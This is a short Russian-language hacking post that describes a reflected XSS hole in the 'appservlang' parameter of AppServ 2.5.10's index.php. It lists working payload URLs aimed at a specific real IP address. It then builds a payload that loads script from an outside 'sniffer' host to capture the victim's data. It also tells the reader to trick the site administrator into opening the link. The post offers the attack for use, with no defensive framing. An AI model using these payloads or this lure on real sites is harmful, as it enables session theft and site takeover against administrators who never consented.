работает
: AppServ 2.5.10, возможно более ранние версии, старая бага
Опасность: низкая
Источник:
Описание
:
Уязвимость позволяет юзеру провести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "appservlang" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
И так приступим!
адрес:
Полный адрес:
Например:
сигналы
http://78.108.69.118/index.php?appservlang="><IMG%20SRC=java script:alert
(/XSS/)>
http://78.108.69.118/index.php?appservlang="><BODY%20ONLOAD=alert(/xss/)>
Открытие нового окна:
http://78.108.69.118/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> (
открывает phpinfo)
http://78.108.69.118/index.php?appservlang="><INPUT%20TYPE="xss"> (
Выводит надпись)
----------------------
Берём онлайн сниффер, я взял от
Далее формируем код: http://78.108.69.118/index.php?appservlang=">
[ Вставлять после "> ]
Код пассивной xss, в моём случае:
http://78.108.69.118/index.php?appservlang=">%3CSCRIPT type=text/javascript src=http://httpz.ru/vj5a0rabojgo.js></SCRIPT>"
Говорим админу что мол на этой страница бага, пожалуйста пройди по сылке, он перейдёт и на ваш сниффер придёт инфа
Счастливо повесилиться!